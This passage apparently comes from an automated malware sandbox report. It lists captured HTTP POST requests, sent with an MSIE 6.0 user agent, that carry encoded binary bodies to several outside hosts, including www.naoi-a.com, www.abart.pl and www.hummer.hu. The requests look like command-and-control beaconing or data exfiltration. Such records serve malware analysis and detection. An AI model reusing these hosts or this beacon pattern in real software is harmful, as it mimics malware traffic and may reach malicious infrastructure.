tU5dztC4Xpkyy2OiYzUx0IPowq74z3asBBWzrK8I0yZJAuzXtxbrVq7BrXk7D6G1U542NJrJjlrwAnIgIRRV5B2zKtIzaBvmaRPhfYjXP4ylx0mmdoEMpKRv7X6zMI9aqWfPAWiWLF5ydE9TRpTY9r0WSf1gT1FWjF5fnszQ8IGB7V6ujisYTdmj/D/ATXim9sM6Exna+g9eZWZCzSSzTcoMNfUaStm55kmd+QJfb9kG90yp+xWD3Ob+9RGZYl/VTLbIK6oA7YM3ixkPvmVpt5O1yxJKz4dAG+Axr9PINEtX+HOQRiUnYnPRbcK3WIol5ru4DmR2/96V6N2iGa19151YuaX+gwNia5B49lq74LEtKBlY9u9OWhJF+GZn1uRunNHl5b4z6tHn+KsDgrcV2D85FqHipYprQpB3S3bvNdnziXcp8o1W9ltE2GHvWNTxTvOHKjXrPZVdzkMa0AG8ck/Y2B/lVGEWNskvyOwZ4HXq9xhj4NhejxRfNMjFA7JqcOPC+mhlxpKlf+RI60j86MMnS70RUzjr3ir/6aMgKRxvQ2ifKclQ2ePo
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 6e 34 4e 39 59 38 6e 67 61 35 6c 42 35 73 4c 38 47 48 4d 61 39 75 4c 4c 52 34 2f 6e 7a 61 2f 55 44 61 44 71 4f 42 35 68 58 38 78 64 39 65 55 62 6f 35 65 68 6d 41 6a 2b 68 4d 62 6f 47 51 6b 69 4c 63 32 53 64 61 67 51 74 4a 35 65 37 38 4d 54 50 62 6e 48 6a 57 43 50 44 66 4d 77 51 38 6f 43 35 45 62 38 75 70 76 5a 44 63 48 36 63 74 59 6f 4a 55 57 30 5a 78 54 61 37 62 39 45 4c 66 36 36 36 68 67 70 55 48 61 6f 73 43 48 62 56 73 53 67 42 73 38 32 30 37 7a 4e 6f 6c 35 44 7a 59 72 46 6d 35 6e 62 62 4a 71 70 4e 57 2f 6b 73 7a 5a 44 76 44 34 4a 63 78 39 4a 43 65 6c 58 30 6c 4b 46 4e 2b 66 7a 7a 50 55 73 59 41 70 53 44 6c 58 41 70 2b 76 73 4e 4e 4e 4a 53 66 64 78 45 53 66 4b 53 53 63 36 71 45 73 55 4f 6f 49 47 49 36 30 44 6b 46 72 5a 6f 53 46 66 56 4f 79 42 63 33 71 71 36 45 38 55 38 34 55 4b 79 30 75 4d 36 35 30 42 62 58 58 69 63 58 74 49 32 43 58 2b 37 6f 31 54 2b 58 31 43 46 6b 2f 48 53 58 62 50 39 37 47 5a 66 4b 74 66 6c 76 43 56 6f 72 4d 46 78 34 4d 59 49 6c 48 52 71 2f 58 79 44 36 7a 6d 58 67 79 51 74 75 38 58 71 31 47 5a 73 4a 6f 70 42 4a 6f 2b 52 54 36 46 51 36 6a 48 59 50 74 39 49 5a 54 39 79 35 48 61 2f 47 71 67 4e 75 79 31 42 63 38 4f 53 5a 77 75 50 32 64 6a 6e 37 58 43 76 61 79 67 6d 6b 65 31 33 30 54 55 75 69 37 77 4b 66 51 5a 76 4e 58 6f 6c 76 57 53 2f 36 65 78 76 55 53 51 2f 35 38 44 2f 52 64 6c 74 7a 49 45 66 2b 2f 50 6b 56 38 39 42 74 35 73 35 4c 52 5a 69 59 55 6c 46 62 35 79 38 58 67 58 4b 62 36 68 33 77 44 78 45 48 4a 39 66 6e 41 4c 68 55 5a 43 64 6f 78 47 48 70 71 56 76 61 56 39 4b 6d 46 4b 6d 2b 42 2f 4b 41 58 79 4f 6a 7a 76 33 74 67 50 66 38 64 5a 50 77 78 72 42 54 53 56 2b 73 45 67 42 36 35 46 57 6e 4b 44 78 67 4e 75 76 54 4b 7a 63 78 2f 77 74 6a 67 72 43 56 5a 68 46 6d 30 36 2b 61 4b 69 36 54 54 2f 71 45 34 3d Data Ascii: n4N9Y8nga5lB5sL8GHMa9uLLR4/nza/UDaDqOB5hX8xd9eUbo5ehmAj+hMboGQkiLc2SdagQtJ5e78MTPbnHjWCPDfMwQ8oC5Eb8upvZDcH6ctYoJUW0ZxTa7b9ELf666hgpUHaosCHbVsSgBs8207zNol5DzYrFm5nbbJqpNW/kszZDvD4Jcx9JCelX0lKFN+fzzPUsYApSDlXAp+vsNNNJSfdxESfKSSc6qEsUOoIGI60DkFrZoSFfVOyBc3qq6E8U84UKy0uM650BbXXicXtI2CX+7o1T+X1CFk/HSXbP97GZfKtflvCVorMFx4MYIlHRq/XyD6zmXgyQtu8Xq1GZsJopBJo+RT6FQ6jHYPt9IZT9y5Ha/GqgNuy1Bc8OSZwuP2djn7XCvaygmke130TUui7wKfQZvNXolvWS/6exvUSQ/58D/RdltzIEf+/PkV89Bt5s5LRZiYUlFb5y8XgXKb6h3wDxEHJ9fnALhUZCdoxGHpqVvaV9KmFKm+B/KAXyOjzv3tgPf8dZPwxrBTSV+sEgB65FWnKDxgNuvTKzcx/wtjgrCVZhFm06+aKi6TT/qE4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 78 6a 6d 4d 77 39 61 66 66 35 6d 71 58 61 79 45 73 56 56 2f 66 58 6d 58 30 61 70 32 4d 6c 6b 44 61 6c 47 69 31 30 44 4f 38 4b 4c 37 79 6c 71 7a 71 37 67 77 62 53 41 42 48 56 35 34 74 33 6c 56 46 78 48 6e 54 74 6e 36 6d 65 4e 43 58 31 46 4d 38 2f 65 31 48 62 65 74 6b 30 63 54 38 66 68 65 58 49 6b 57 58 41 59 76 43 67 6e 4b 6e 55 4b 6e 66 6b 55 70 33 79 58 48 55 44 4d 6c 47 50 33 58 37 41 71 74 64 68 41 79 6c 58 53 63 58 6e 45 37 4e 4f 45 36 51 4b 6f 4b 38 37 47 73 61 45 54 37 2b 6d 37 45 52 56 46 63 34 35 71 31 69 36 5a 6e 39 70 4a 46 4c 6b 63 38 51 48 66 6c 58 33 6b 4d 49 61 42 6d 74 53 33 7a 4d 45 59 41 47 4c 32 4e 41 69 46 6d 77 5a 39 58 6e 54 66 77 61 4c 37 50 46 37 6b 4c 32 41 4e 69 46 34 4a 4e 72 79 77 34 4e 67 4f 42 63 79 33 7a 4e 77 44 74 48 31 63 51 48 5a 7a 55 6e 4f 4d 62 63 70 65 7a 61 47 5a 33 2b 44 4f 69 2b 43 62 65 51 6d 33 47 42 59 62 43 4f 58 36 4a 35 4a 49 35 6f 6c 6a 46 2b 66 65 2b 42 37 75 74 48 70 39 59 46 46 39 59 7a 59 59 63 7a 52 75 74 33 52 65 41 38 49 79 78 76 58 71 5a 45 55 74 38 39 4b 48 57 34 59 62 65 70 47 47 4a 5a 66 52 2f 71 66 78 6a 4e 38 56 55 6b 30 57 75 52 58 6d 57 55 65 6a 68 6b 65 49 39 46 41 43 4f 6d 42 43 39 4c 49 71 59 71 45 32 53 4f 67 4e 4f 44 6b 73 6b 75 35 2f 41 78 51 52 36 66 51 52 4f 37 55 4e 58 6c 73 2b 30 6e 33 52 61 68 53 44 76 30 54 50 63 39 2f 44 45 77 68 46 77 48 72 67 56 6e 30 39 56 43 4c 50 75 50 46 53 4f 58 79 78 70 56 46 37 31 64 4c 72 6e 71 51 45 70 36 47 6f 48 32 6c 2b 62 54 49 58 56 6d 53 55 51 61 47 38 68 56 38 2b 56 41 37 47 6e 65 50 6a 54 74 7a 6c 53 30 6a 42 2f 31 44 54 36 6a 6f 47 6b 69 33 39 76 72 76 51 2b 50 34 37 32 Data Ascii: xjmMw9aff5mqXayEsVV/fXmX0ap2MlkDalGi10DO8KL7ylqzq7gwbSABHV54t3lVFxHnTtn6meNCX1FM8/e1Hbetk0cT8fheXIkWXAYvCgnKnUKnfkUp3yXHUDMlGP3X7AqtdhAylXScXnE7NOE6QKoK87GsaET7+m7ERVFc45q1i6Zn9pJFLkc8QHflX3kMIaBmtS3zMEYAGL2NAiFmwZ9XnTfwaL7PF7kL2ANiF4JNryw4NgOBcy3zNwDtH1cQHZzUnOMbcpezaGZ3+DOi+CbeQm3GBYbCOX6J5JI5oljF+fe+B7utHp9YFF9YzYYczRut3ReA8IyxvXqZEUt89KHW4YbepGGJZfR/qfxjN8VUk0WuRXmWUejhkeI9FACOmBC9LIqYqE2SOgNODksku5/AxQR6fQRO7UNXls+0n3RahSDv0TPc9/DEwhFwHrgVn09VCLPuPFSOXyxpVF71dLrnqQEp6GoH2l+bTIXVmSUQaG8hV8+VA7GnePjTtzlS0jB/1DT6joGki39vrvQ+P472
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 36 31 53 47 77 36 69 66 66 35 6b 30 69 32 4a 4b 61 2f 37 75 65 42 76 74 73 48 36 77 47 7a 6d 45 58 50 32 37 49 2f 78 57 2b 79 30 79 50 64 34 64 2f 4a 45 4c 33 6f 36 65 55 6d 42 2b 2b 6b 78 48 2f 7a 47 7a 74 6b 46 4f 71 58 49 6f 73 64 6f 6d 6e 31 71 56 6c 56 50 79 51 67 78 53 55 74 67 58 65 56 75 39 71 77 6c 54 71 73 47 45 6c 6c 78 32 56 6e 63 66 46 56 75 6f 77 49 6d 51 4e 73 66 43 74 41 56 74 4d 49 67 7a 30 30 41 39 2b 48 68 32 5a 30 77 62 53 39 58 55 4b 31 70 78 4d 75 6a 75 75 4a 53 66 72 68 6b 47 6f 57 6b 49 4f 33 4c 39 39 4e 52 4a 54 74 75 33 64 65 5a 58 76 50 49 44 46 4a 59 79 4a 62 6f 5a 4a 6a 54 4b 62 47 61 6a 69 55 30 48 49 6d 64 52 4b 6f 65 5a 52 48 77 6d 36 49 72 5a 66 4f 33 33 66 57 63 6a 4e 39 50 77 38 43 56 30 77 73 36 67 51 77 6b 68 50 71 68 6a 4b 63 4f 6e 57 55 31 59 55 58 4c 50 78 71 76 43 74 6a 32 71 57 56 62 75 51 6d 73 75 6a 32 75 56 4a 72 56 7a 50 6a 44 34 63 4f 2b 69 77 48 4d 4c 4e 70 6c 4d 74 52 46 6a 68 71 4c 76 31 46 6a 61 4f 4b 74 34 52 56 58 62 6a 6c 67 58 71 4f 68 53 71 58 65 2f 6a 66 6b 4c 70 68 2b 34 48 69 53 39 70 59 76 42 43 79 71 6a 6c 7a 33 4f 67 69 44 6d 55 6a 6f 5a 6e 36 53 33 72 74 36 62 4b 73 6a 4b 57 37 72 38 50 53 73 61 52 63 68 61 34 2b 4f 4d 50 31 53 51 68 67 33 39 2f 34 72 73 6e 68 35 34 38 43 70 37 37 69 4a 56 52 6c 48 6f 4a 6f 66 6b 2b 6a 33 35 42 30 6f 52 38 42 73 72 43 30 33 77 56 5a 6b 75 54 7a 46 54 43 53 4f 73 53 39 44 33 44 77 32 4c 74 72 77 69 6b 48 50 2b 52 47 70 31 6a 46 51 69 38 37 4d 4d 74 34 68 70 41 52 4e 56 2b 47 54 64 49 51 64 59 42 51 6c 51 39 77 45 6e 35 51 76 66 5a 75 77 79 73 45 69 6c 77 45 52 4d 68 62 6e 53 38 54 44 65 62 75 51 6c 48 6b 41 66 37 43 36 78 49 58 30 32 57 51 67 5a 72 6c 4e 5a Data Ascii: 61SGw6iff5k0i2JKa/7ueBvtsH6wGzmEXP27I/xW+y0yPd4d/JEL3o6eUmB++kxH/zGztkFOqXIosdomn1qVlVPyQgxSUtgXeVu9qwlTqsGEllx2VncfFVuowImQNsfCtAVtMIgz00A9+Hh2Z0wbS9XUK1pxMujuuJSfrhkGoWkIO3L99NRJTtu3deZXvPIDFJYyJboZJjTKbGajiU0HImdRKoeZRHwm6IrZfO33fWcjN9Pw8CV0ws6gQwkhPqhjKcOnWU1YUXLPxqvCtj2qWVbuQmsuj2uVJrVzPjD4cO+iwHMLNplMtRFjhqLv1FjaOKt4RVXbjlgXqOhSqXe/jfkLph+4HiS9pYvBCyqjlz3OgiDmUjoZn6S3rt6bKsjKW7r8PSsaRcha4+OMP1SQhg39/4rsnh548Cp77iJVRlHoJofk+j35B0oR8BsrC03wVZkuTzFTCSOsS9D3Dw2LtrwikHP+RGp1jFQi87MMt4hpARNV+GTdIQdYBQlQ9wEn5QvfZuwysEilwERMhbnS8TDebuQlHkAf7C6xIX02WQgZrlNZ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6f 76 46 73 34 45 79 65 2b 64 48 62 63 77 4c 4d 74 30 57 61 30 46 2f 37 6e 41 34 6b 65 66 48 66 51 44 51 65 56 53 37 67 70 78 58 47 4b 55 4b 38 69 33 66 53 35 45 76 41 48 56 6d 6b 65 43 4e 33 70 59 65 51 2f 77 63 66 39 70 6a 39 72 78 38 31 6d 41 44 39 34 77 6a 4a 66 74 45 49 34 67 48 66 79 69 2f 43 41 34 6c 57 32 31 70 36 55 35 47 51 7a 38 4d 74 30 47 31 4e 6e 6e 41 6d 73 55 71 4a 75 42 59 59 41 47 6b 76 64 67 56 47 6c 34 58 33 6d 55 61 46 6f 55 7a 59 6b 71 38 53 54 4b 71 41 6a 76 66 66 38 79 50 6e 65 58 69 34 34 4b 63 49 52 63 6b 6e 76 34 44 31 56 38 36 37 46 4a 68 53 6b 68 58 70 6e 61 57 4e 53 73 52 65 62 55 45 66 42 45 77 67 2f 52 57 64 67 38 46 71 4c 33 65 4f 77 66 38 65 7a 50 44 41 5a 45 58 66 57 2b 59 49 52 61 33 6a 6f 4a 71 4a 43 43 47 2b 74 6d 6f 7a 72 49 38 75 4d 43 31 75 66 4b 4e 69 69 34 41 64 6b 48 43 68 4a 70 67 65 79 35 38 4d 4f 48 4c 31 73 68 70 4d 54 79 4a 44 6c 45 77 66 6c 48 45 62 6e 75 65 6d 51 6d 79 64 50 70 57 31 76 2b 79 50 33 34 4d 6a 72 66 50 6b 4f 66 67 53 72 78 75 74 56 62 53 2b 77 55 57 31 2f 7a 63 6b 63 31 2b 38 6c 36 68 6e 50 35 70 52 64 4a 6e 4e 54 68 31 77 6f 33 50 34 50 50 6f 6e 30 79 41 4b 2b 66 34 50 37 31 4e 44 35 77 61 6a 72 41 47 6c 65 72 6c 4f 74 6f 31 35 63 46 4e 34 46 7a 41 63 4d 51 6c 67 77 58 50 66 73 2f 78 78 5a 47 52 59 2b 33 75 48 43 49 6a 59 4d 36 55 65 47 71 52 65 48 61 55 77 35 50 52 2b 35 51 39 6b 65 6b 72 32 43 63 36 51 36 4b 55 6d 55 49 5a 55 61 54 76 5a 33 6b 4d 50 6f 39 47 70 2b 4e 6d 72 66 62 50 50 4e 30 31 4e 6c 32 76 71 68 58 76 43 41 68 76 48 78 5a 73 50 33 69 67 4b 78 4b 59 74 70 55 55 2f 71 59 45 53 47 30 30 3d Data Ascii: ovFs4Eye+dHbcwLMt0Wa0F/7nA4kefHfQDQeVS7gpxXGKUK8i3fS5EvAHVmkeCN3pYeQ/wcf9pj9rx81mAD94wjJftEI4gHfyi/CA4lW21p6U5GQz8Mt0G1NnnAmsUqJuBYYAGkvdgVGl4X3mUaFoUzYkq8STKqAjvff8yPneXi44KcIRcknv4D1V867FJhSkhXpnaWNSsRebUEfBEwg/RWdg8FqL3eOwf8ezPDAZEXfW+YIRa3joJqJCCG+tmozrI8uMC1ufKNii4AdkHChJpgey58MOHL1shpMTyJDlEwflHEbnuemQmydPpW1v+yP34MjrfPkOfgSrxutVbS+wUW1/zckc1+8l6hnP5pRdJnNTh1wo3P4PPon0yAK+f4P71ND5wajrAGlerlOto15cFN4FzAcMQlgwXPfs/xxZGRY+3uHCIjYM6UeGqReHaUw5PR+5Q9kekr2Cc6Q6KUmUIZUaTvZ3kMPo9Gp+NmrfbPPN01Nl2vqhXvCAhvHxZsP3igKxKYtpUU/qYESG00=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 47 6e 4d 72 78 56 4f 74 66 35 6c 54 6a 69 48 47 47 74 49 55 31 50 78 71 43 39 34 35 66 6f 31 50 4e 38 44 72 71 43 38 4e 72 53 79 46 44 71 75 66 46 58 30 35 76 61 45 73 66 54 4f 70 79 39 35 6d 61 30 51 38 6a 44 63 48 42 6d 43 45 51 43 77 72 4f 5a 55 4c 6f 79 55 4b 73 6a 30 36 53 32 45 6f 65 74 55 2b 2f 6e 4e 32 72 4f 52 77 56 61 59 75 4c 77 51 46 4c 61 59 51 54 65 49 6b 37 57 45 49 77 47 2b 33 30 44 78 64 2b 76 6d 6c 73 34 6d 46 77 53 5a 36 65 70 59 70 6e 63 42 42 72 38 44 77 6c 47 54 45 6b 36 48 67 4a 72 41 47 6f 2f 48 48 37 31 30 75 61 39 30 4d 7a 48 48 2f 67 77 2b 67 52 4b 62 4b 38 5a 71 72 45 4e 35 56 39 43 50 35 52 72 6b 76 46 56 42 73 41 72 6c 55 75 49 4a 6d 2b 34 52 5a 6b 69 63 74 57 4a 44 52 34 53 49 4a 6b 74 69 4e 52 67 2b 69 2f 64 64 49 62 50 6d 48 34 49 35 69 65 42 56 69 68 35 77 44 43 31 53 46 50 30 37 4d 37 42 57 5a 65 79 6b 50 4a 6b 7a 66 57 77 42 45 72 73 59 53 66 39 77 5a 6e 37 5a 43 43 54 2f 4a 31 78 76 78 45 38 46 4d 45 38 37 6d 30 51 62 33 6c 61 6c 32 4f 50 78 34 4f 73 63 57 4f 71 47 6c 61 30 61 38 38 69 45 69 42 57 7a 30 37 4c 45 4d 67 54 79 6a 76 55 4d 4c 74 37 76 51 36 30 41 6d 77 46 72 4c 35 75 56 68 37 43 6f 46 48 6b 7a 33 46 69 31 72 4a 57 75 4c 74 45 41 43 41 41 52 6c 6e 6c 7a 6e 6a 54 57 6d 7a 45 47 4d 63 4f 6f 77 6d 58 4c 74 47 54 36 52 36 38 50 37 34 71 2f 77 63 74 5a 7a 47 43 51 78 63 75 33 58 50 42 61 66 53 55 46 56 52 4d 4b 31 72 69 31 7a 6a 32 50 7a 38 30 4b 4d 6b 55 55 6d 41 6f 62 7a 30 35 74 49 61 4c 75 45 41 31 79 58 6f 73 2f 44 49 59 2f 2f 6e 61 73 48 46 6d 6f 6c 74 4f 39 38 68 54 77 68 37 53 78 37 35 52 61 78 78 53 69 64 47 6a 37 6b 45 38 4b 4c 50 63 37 50 47 32 51 35 66 43 4b 51 43 5a 57 75 6d 33 4b 54 6a 74 56 33 70 48 49 3d Data Ascii: GnMrxVOtf5lTjiHGGtIU1PxqC945fo1PN8DrqC8NrSyFDqufFX05vaEsfTOpy95ma0Q8jDcHBmCEQCwrOZULoyUKsj06S2EoetU+/nN2rORwVaYuLwQFLaYQTeIk7WEIwG+30Dxd+vmls4mFwSZ6epYpncBBr8DwlGTEk6HgJrAGo/HH710ua90MzHH/gw+gRKbK8ZqrEN5V9CP5RrkvFVBsArlUuIJm+4RZkictWJDR4SIJktiNRg+i/ddIbPmH4I5ieBVih5wDC1SFP07M7BWZeykPJkzfWwBErsYSf9wZn7ZCCT/J1xvxE8FME87m0Qb3lal2OPx4OscWOqGla0a88iEiBWz07LEMgTyjvUMLt7vQ60AmwFrL5uVh7CoFHkz3Fi1rJWuLtEACAARlnlznjTWmzEGMcOowmXLtGT6R68P74q/wctZzGCQxcu3XPBafSUFVRMK1ri1zj2Pz80KMkUUmAobz05tIaLuEA1yXos/DIY//nasHFmoltO98hTwh7Sx75RaxxSidGj7kE8KLPc7PG2Q5fCKQCZWum3KTjtV3pHI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 6e 34 4e 39 59 38 6e 67 61 35 6c 42 35 73 4c 38 47 48 4d 61 39 75 4c 4c 52 34 2f 6e 7a 61 2f 55 44 61 44 71 4f 42 35 68 58 38 78 64 39 65 55 62 6f 35 65 68 6d 41 6a 2b 68 4d 62 6f 47 51 6b 69 4c 63 32 53 64 61 67 51 74 4a 35 65 37 38 4d 54 50 62 6e 48 6a 57 43 50 44 66 4d 77 51 38 6f 43 35 45 62 38 75 70 76 5a 44 63 48 36 63 74 59 6f 4a 55 57 30 5a 78 54 61 37 62 39 45 4c 66 36 36 36 68 67 70 55 48 61 6f 73 43 48 62 56 73 53 67 42 73 38 32 30 37 7a 4e 6f 6c 35 44 7a 59 72 46 6d 35 6e 62 62 4a 71 70 4e 57 2f 6b 73 7a 5a 44 76 44 34 4a 63 78 39 4a 43 65 6c 58 30 6c 4b 46 4e 2b 66 7a 7a 50 55 73 59 41 70 53 44 6c 58 41 70 2b 76 73 4e 4e 4e 4a 53 66 64 78 45 53 66 4b 53 53 63 36 71 45 73 55 4f 6f 49 47 49 36 30 44 6b 46 72 5a 6f 53 46 66 56 4f 79 42 63 33 71 71 36 45 38 55 38 34 55 4b 79 30 75 4d 36 35 30 42 62 58 58 69 63 58 74 49 32 43 58 2b 37 6f 31 54 2b 58 31 43 46 6b 2f 48 53 58 62 50 39 37 47 5a 66 4b 74 66 6c 76 43 56 6f 72 4d 46 78 34 4d 59 49 6c 48 52 71 2f 58 79 44 36 7a 6d 58 67 79 51 74 75 38 58 71 31 47 5a 73 4a 6f 70 42 4a 6f 2b 52 54 36 46 51 36 6a 48 59 50 74 39 49 5a 54 39 79 35 48 61 2f 47 71 67 4e 75 79 31 42 63 38 4f 53 5a 77 75 50 32 64 6a 6e 37 58 43 76 61 79 67 6d 6b 65 31 33 30 54 55 75 69 37 77 4b 66 51 5a 76 4e 58 6f 6c 76 57 53 2f 36 65 78 76 55 53 51 2f 35 38 44 2f 52 64 6c 74 7a 49 45 66 2b 2f 50 6b 56 38 39 42 74 35 73 35 4c 52 5a 69 59 55 6c 46 62 35 79 38 58 67 58 4b 62 36 68 33 77 44 78 45 48 4a 39 66 6e 41 4c 68 55 5a 43 64 6f 78 47 48 70 71 56 76 61 56 39 4b 6d 46 4b 6d 2b 42 2f 4b 41 58 79 4f 6a 7a 76 33 74 67 50 66 38 64 5a 50 77 78 72 42 54 53 56 2b 73 45 67 42 36 35 46 57 6e 4b 44 78 67 4e 75 76 54 4b 7a 63 78 2f 77 74 6a 67 72 43 56 5a 68 46 6d 30 36 2b 61 4b 69 36 54 54 2f 71 45 34 3d Data Ascii: n4N9Y8nga5lB5sL8GHMa9uLLR4/nza/UDaDqOB5hX8xd9eUbo5ehmAj+hMboGQkiLc2SdagQtJ5e78MTPbnHjWCPDfMwQ8oC5Eb8upvZDcH6ctYoJUW0ZxTa7b9ELf666hgpUHaosCHbVsSgBs8207zNol5DzYrFm5nbbJqpNW/kszZDvD4Jcx9JCelX0lKFN+fzzPUsYApSDlXAp+vsNNNJSfdxESfKSSc6qEsUOoIGI60DkFrZoSFfVOyBc3qq6E8U84UKy0uM650BbXXicXtI2CX+7o1T+X1CFk/HSXbP97GZfKtflvCVorMFx4MYIlHRq/XyD6zmXgyQtu8Xq1GZsJopBJo+RT6FQ6jHYPt9IZT9y5Ha/GqgNuy1Bc8OSZwuP2djn7XCvaygmke130TUui7wKfQZvNXolvWS/6exvUSQ/58D/RdltzIEf+/PkV89Bt5s5LRZiYUlFb5y8XgXKb6h3wDxEHJ9fnALhUZCdoxGHpqVvaV9KmFKm+B/KAXyOjzv3tgPf8dZPwxrBTSV+sEgB65FWnKDxgNuvTKzcx/wtjgrCVZhFm06+aKi6TT/qE4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 31 69 5a 4a 39 45 53 46 69 5a 6c 2b 38 56 75 70 58 38 38 6e 31 78 65 52 33 56 46 38 52 33 41 4b 75 49 35 43 47 68 43 36 44 39 43 56 54 64 57 77 43 4a 61 32 44 76 36 52 39 33 4f 4e 6e 73 39 59 33 39 52 4d 4e 45 6d 64 2f 61 57 73 4f 54 35 70 46 6f 52 49 51 56 6a 59 64 63 6c 76 57 69 70 6e 47 73 5a 65 62 52 30 6f 63 7a 67 7a 38 31 34 4e 66 6f 38 42 51 73 30 77 4c 6e 46 72 4b 4c 59 63 72 65 6b 4a 43 69 6b 66 7a 71 53 5a 66 67 2b 4a 77 31 56 78 2b 39 4c 67 62 78 62 66 47 6e 62 42 72 75 39 37 4b 36 47 56 38 2b 6b 76 63 7a 65 2f 64 54 52 47 44 2f 32 31 43 6b 77 38 58 71 75 6b 73 71 4d 56 74 4c 39 6b 45 73 31 75 6e 72 57 6f 4b 37 37 74 49 68 52 35 44 71 4c 41 64 33 77 62 36 49 35 63 4f 6e 4b 71 41 78 59 48 74 39 51 67 5a 47 50 33 42 46 32 52 58 4f 32 50 73 33 53 54 32 6e 71 6c 6f 58 49 2b 71 31 48 4a 33 66 33 53 48 36 52 5a 73 38 6a 67 65 78 6d 75 39 4a 67 47 53 67 63 54 46 73 55 32 6c 4b 4c 62 4c 68 37 4d 6d 38 7a 56 65 38 5a 4d 6c 7a 65 55 68 46 4a 71 66 38 4f 6b 66 4b 4a 41 6b 50 4f 6e 78 31 44 4a 57 6f 53 30 6c 78 6e 2b 38 6b 78 69 78 4d 4e 34 44 39 6f 6b 2b 33 62 70 4d 35 54 6b 57 63 43 4d 64 74 4c 54 64 46 61 78 54 50 48 6a 49 50 7a 44 2f 42 58 52 4c 34 62 33 48 35 35 5a 66 77 49 66 76 4d 6f 31 4d 5a 2f 34 78 6d 62 67 48 49 48 7a 4d 6f 76 54 66 2f 6d 4a 32 65 4e 56 44 63 66 57 75 54 49 39 67 62 67 6e 64 45 6c 6d 65 44 46 36 72 47 52 43 43 46 61 65 45 72 54 36 76 5a 54 4c 50 77 57 56 59 4d 47 4b 2b 70 4f 4e 75 41 5a 59 2b 47 55 4d 4e 66 34 6d 70 42 36 48 74 6b 66 79 30 49 53 30 43 62 64 64 72 67 79 63 48 34 34 61 37 39 74 61 74 67 4c 48 75 5a 51 73 33 35 42 76 48 78 79 31 78 46 44 50 77 57 7a 6d 58 6b 4e 2b 6e 53 77 39 4b 59 43 2b 53 4e 75 64 62 45 4d 39 50 66 43 56 7a 59 48 6f 2b 6f 59 2f 49 69 37 6f 4f 41 39 49 44 61 77 55 66 35 79 57 63 31 4b 42 37 77 3d 3d Data Ascii: 1iZJ9ESFiZl+8VupX88n1xeR3VF8R3AKuI5CGhC6D9CVTdWwCJa2Dv6R93ONns9Y39RMNEmd/aWsOT5pFoRIQVjYdclvWipnGsZebR0oczgz814Nfo8BQs0wLnFrKLYcrekJCikfzqSZfg+Jw1Vx+9LgbxbfGnbBru97K6GV8+kvcze/dTRGD/21Ckw8XquksqMVtL9kEs1unrWoK77tIhR5DqLAd3wb6I5cOnKqAxYHt9QgZGP3BF2RXO2Ps3ST2nqloXI+q1HJ3f3SH6RZs8jgexmu9JgGSgcTFsU2lKLbLh7Mm8zVe8ZMlzeUhFJqf8OkfKJAkPOnx1DJWoS0lxn+8kxixMN4D9ok+3bpM5TkWcCMdtLTdFaxTPHjIPzD/BXRL4b3H55ZfwIfvMo1MZ/4xmbgHIHzMovTf/mJ2eNVDcfWuTI9gbgndElmeDF6rGRCCFaeErT6vZTLPwWVYMGK+pONuAZY+GUMNf4mpB6Htkfy0IS0CbddrgycH44a79tatgLHuZQs35BvHxy1xFDPwWzmXkN+nSw9KYC+SNudbEM9PfCVzYHo+oY/Ii7oOA9IDawUf5yWc1KB7w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 66 51 38 72 38 56 78 72 69 5a 6b 79 6e 6f 6c 71 68 77 38 73 52 65 38 61 76 63 56 30 59 7a 59 4f 55 49 49 72 6e 50 42 61 68 44 38 47 65 44 37 70 4d 66 70 47 46 64 4c 62 61 4e 43 6f 64 67 31 76 55 6a 30 69 50 41 4a 33 6d 67 65 6f 33 6b 68 64 36 64 37 79 35 51 64 31 6f 52 65 76 46 30 67 46 68 56 66 73 66 32 51 6d 42 71 6f 30 4c 62 74 4e 45 52 53 59 2b 66 65 67 7a 54 62 2f 63 4b 4c 57 53 48 34 58 45 38 42 46 45 6f 5a 49 42 67 4b 55 61 76 4b 50 73 74 6b 4c 42 4e 39 46 4a 73 4b 48 64 34 30 47 5a 33 61 39 5a 2f 6a 46 61 32 35 6c 78 54 46 41 56 30 4b 30 58 68 47 78 79 54 37 4c 4e 57 34 44 33 6e 34 54 55 73 59 6c 5a 77 51 36 34 49 33 50 7a 4c 5a 75 69 4c 6e 59 77 50 2f 75 52 62 36 62 43 53 56 72 78 34 42 49 50 5a 35 55 4d 59 66 50 31 4d 6f 41 33 4c 53 4a 6a 54 54 43 54 41 30 37 4d 2b 59 5a 6b 39 64 61 37 6b 70 47 70 36 52 32 42 55 4e 49 4f 71 